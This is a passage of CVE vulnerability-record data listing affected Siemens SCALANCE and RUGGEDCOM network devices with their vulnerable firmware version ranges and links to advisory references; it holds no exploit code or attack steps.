| Siemens | SCALANCE XP208G PoE EEC |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XP208G PP |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XP208PoE EEC |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XP216 |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XP216 (Ethernet/IP) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XP216 (V2) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XP216EEC |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XP216EEC (V2) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XP216G |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XP216G EEC |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XP216G PoE EEC |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XP216POE EEC |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XP216PoE EEC (V2) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XR324WG (24 x FE, AC 230V) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XR324WG (24 X FE, DC 24V) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XR326-2C PoE WG |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XR326-2C PoE WG (without UL) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XR328-4C WG (24XFE, 4XGE, 24V) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XR328-4C WG (24xFE, 4xGE,DC24V) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XR328-4C WG (24xFE,4xGE,AC230V) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XR328-4C WG (28xGE, AC 230V) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XR328-4C WG (28xGE, DC 24V) |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SCALANCE XR524-8C, 1x230V |
Affected:
V6.1.0 , < V6.1.1
(custom)
|
|
| Siemens | SCALANCE XR524-8C, 1x230V (L3 int.) |
Affected:
V6.1.0 , < V6.1.1
(custom)
|
|
| Siemens | SCALANCE XR524-8C, 24V |
Affected:
V6.1.0 , < V6.1.1
(custom)
|
|
| Siemens | SCALANCE XR524-8C, 24V (L3 int.) |
Affected:
V6.1.0 , < V6.1.1
(custom)
|
|
| Siemens | SCALANCE XR524-8C, 2x230V |
Affected:
V6.1.0 , < V6.1.1
(custom)
|
|
| Siemens | SCALANCE XR524-8C, 2x230V (L3 int.) |
Affected:
V6.1.0 , < V6.1.1
(custom)
|
|
| Siemens | SCALANCE XR526-8C, 1x230V |
Affected:
V6.1.0 , < V6.1.1
(custom)
|
|
| Siemens | SCALANCE XR526-8C, 1x230V (L3 int.) |
Affected:
V6.1.0 , < V6.1.1
(custom)
|
|
| Siemens | SCALANCE XR526-8C, 24V |
Affected:
V6.1.0 , < V6.1.1
(custom)
|
|
| Siemens | SCALANCE XR526-8C, 24V (L3 int.) |
Affected:
V6.1.0 , < V6.1.1
(custom)
|
|
| Siemens | SCALANCE XR526-8C, 2x230V |
Affected:
V6.1.0 , < V6.1.1
(custom)
|
|
| Siemens | SCALANCE XR526-8C, 2x230V (L3 int.) |
Affected:
V6.1.0 , < V6.1.1
(custom)
|
|
| Siemens | SCALANCE XR528-6M |
Affected:
V6.1.0 , < V6.1.1
(custom)
|
|
| Siemens | SCALANCE XR528-6M (2HR2, L3 int.) |
Affected:
V6.1.0 , < V6.1.1
(custom)
|
|
| Siemens | SCALANCE XR528-6M (2HR2) |
Affected:
V6.1.0 , < V6.1.1
(custom)
|
|
| Siemens | SCALANCE XR528-6M (L3 int.) |
Affected:
V6.1.0 , < V6.1.1
(custom)
|
|
| Siemens | SCALANCE XR552-12M |
Affected:
V6.1.0 , < V6.1.1
(custom)
|
|
| Siemens | SCALANCE XR552-12M (2HR2, L3 int.) |
Affected:
V6.1.0 , < V6.1.1
(custom)
|
|
| Siemens | SCALANCE XR552-12M (2HR2) |
Affected:
V6.1.0 , < V6.1.1
(custom)
|
|
| Siemens | SIPLUS NET SCALANCE XC206-2 |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SIPLUS NET SCALANCE XC206-2SFP |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SIPLUS NET SCALANCE XC208 |
Affected:
V3.0 , < V3.0.2
(custom)
|
|
| Siemens | SIPLUS NET SCALANCE XC216-4C |
Affected:
V3.0 , < V3.0.2
(custom)
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T18:43:56.622Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://www.siemens.com/cert/pool/cert/siemens_security_advisory_ssa-856721.pdf"
},
{
"name": "1039463",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id/1039463"
},
{
"name": "1039464",
"tags": [
"vdb-entry",
"x_refsource_SECTRACK",
"x_transferred"
],
"url": "http://www.securitytracker.com/id/1039464"
},
{
"name": "101041",
"tags": [
"vdb-entry",
"x_refsource_BID",
"x_transferred"
],
"url": "http://www.securityfocus.com/bid/101041"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM i800",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM i800NC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM i801",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM i801NC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM i802",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM i802NC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM i803",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM i803NC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM M2100",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM M2100NC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM M2200",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM M2200NC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM M969",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM M969NC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RMC30",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RMC30NC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RMC8388 V4.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RMC8388 V5.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V5.0.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RMC8388NC V4.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RMC8388NC V5.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V5.0.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RP110",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RP110NC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS1600",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS1600F",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS1600FNC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS1600NC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS1600T",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS1600TNC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS400",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS400NC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS401",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS401NC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS416",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS416NC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS416NCv2 V4.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS416NCv2 V5.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V5.0.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS416P",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS416PNC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS416PNCv2 V4.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS416PNCv2 V5.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V5.0.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS416Pv2 V4.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS416Pv2 V5.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V5.0.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS416v2 V4.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS416v2 V5.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V5.0.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS8000",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS8000A",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS8000ANC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS8000H",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS8000HNC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS8000NC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS8000T",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS8000TNC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS900",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS900 (32M) V4.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS900 (32M) V5.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V5.0.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS900G",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS900G (32M) V4.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS900G (32M) V5.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V5.0.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS900GNC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS900GNC(32M) V4.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS900GNC(32M) V5.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V5.0.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS900GP",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS900GPNC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS900L",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS900LNC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS900M-GETS-C01",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS900M-GETS-XX",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS900M-STND-C01",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS900M-STND-XX",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS900MNC-GETS-C01",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS900MNC-GETS-XX",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS900MNC-STND-XX",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS900MNC-STND-XX-C01",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS900NC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS900NC(32M) V4.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS900NC(32M) V5.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V5.0.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS900W",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS910",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS910L",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS910LNC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS910NC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS910W",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS920L",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS920LNC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS920W",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS930L",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS930LNC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS930W",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS940G",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS940GNC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS969",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RS969NC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSG2100",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSG2100 (32M) V4.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSG2100 (32M) V5.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V5.0.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSG2100NC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSG2100NC(32M) V4.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSG2100NC(32M) V5.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V5.0.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSG2100P",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSG2100P (32M) V4.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSG2100P (32M) V5.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V5.0.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSG2100PNC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSG2100PNC (32M) V4.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSG2100PNC (32M) V5.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V5.0.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSG2200",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSG2200NC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSG2288 V4.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSG2288 V5.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V5.0.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSG2288NC V4.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSG2288NC V5.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V5.0.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSG2300 V4.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSG2300 V5.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V5.0.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSG2300NC V4.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSG2300NC V5.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V5.0.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSG2300P V4.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
